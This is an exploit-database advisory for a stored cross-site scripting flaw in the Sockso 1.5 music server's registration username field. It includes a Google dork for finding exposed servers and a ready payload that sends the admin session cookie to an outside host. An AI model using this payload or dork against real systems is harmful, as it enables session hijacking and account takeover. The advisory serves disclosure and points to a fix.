Sockso 1.51 - Persistent Cross-Site Scripting
Author: Ciaran McNally
type: webapps
platform: php
port:
date_added: 2012-05-12
date_updated: 2012-05-13
verified: 1
codes: OSVDB-81873;CVE-2012-4267
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-13-at-103706-am.png
application_url: http://www.exploit-db.comsockso-1.5.1.zip
#######################################################################
Application: Sockso
http://sockso.pu-gh.com
Versions: <= 1.5
Platforms: Windows, Mac, Linux
Bug: Persistant XSS
Exploitation: remote
Date: 11 May 2012.
Author: Ciaran McNally
Web: http://smwyg.com/blog/#sockso-persistant-xss-attack
Google Dork: inurl:"4444" sockso
#######################################################################
1) Bug.
2) The exploit.
3) Fix.
#######################################################################
Sockso is a free, open-source, personal music host server for
everyone! It's designed to be as simple as possible so that anyone with
a mouse and some mp3's can get their friends listening to their music
across the internet in seconds!"
#######################################################################
======
1) Bug
======
On Registration page (normally @ "4444/user/register") the username
input is never sanitized. This is then stored in the database of users
and displayed in the admin panel & user pages.
#######################################################################
==============
2) The exploit
==============
Using a username value of...
<script>alert('xss');</script>
Or the admin cookie session can also be retrieved by using...
<script >new Image().src="bleh.com/xss.php?c="+encodeURI(document.cookie)</script>
#######################################################################
======
3) Fix
======
https://github.com/rodnaph/sockso/pull/99/files
#######################################################################